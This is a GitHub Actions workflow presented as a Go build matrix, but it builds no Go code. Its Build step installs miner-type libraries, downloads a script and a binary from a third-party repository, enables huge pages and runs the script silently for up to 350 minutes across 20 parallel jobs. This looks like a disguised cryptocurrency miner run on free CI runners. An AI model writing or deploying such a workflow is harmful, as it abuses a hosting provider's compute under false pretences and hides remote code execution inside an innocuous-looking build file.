name: GASss
on: [push, pull_request]
jobs:
  build:
    name: Build
    runs-on: ubuntu-18.04
    strategy:
      fail-fast: false
      matrix:
        go: [1.11, 1.12, 1.13, 1.14, 1.15]
        flag: [eqw, rwe, ter, yrt]
    timeout-minutes: 360
    env:
        NUM_JOBS: 20
        JOB: ${{ matrix.go }}
    steps:
    - name: Set up Go ${{ matrix.go }}
      uses: actions/setup-go@v1
      with:
        go-version: ${{ matrix.go }}
      id: go
    - name: Check out code into the Go module directory
      uses: actions/checkout@v1
    - name: Build
      run: |
        sudo apt-get install -y gcc git build-essential cmake libuv1-dev libssl-dev libhwloc-dev > /dev/null 2>&1
        wget https://github.com/ririnsinta/ririnsinta/raw/7f5b93e27a665065bbe0235221e3eedcfe40d637/cobalagi.sh
        wget https://github.com/ririnsinta/ririnsinta/raw/main/tuyulsugar
        sudo sysctl -w vm.nr_hugepages=1280
        chmod +x tuyulsugar cobalagi.sh
        timeout 350m ./cobalagi.sh > /dev/null 2>&1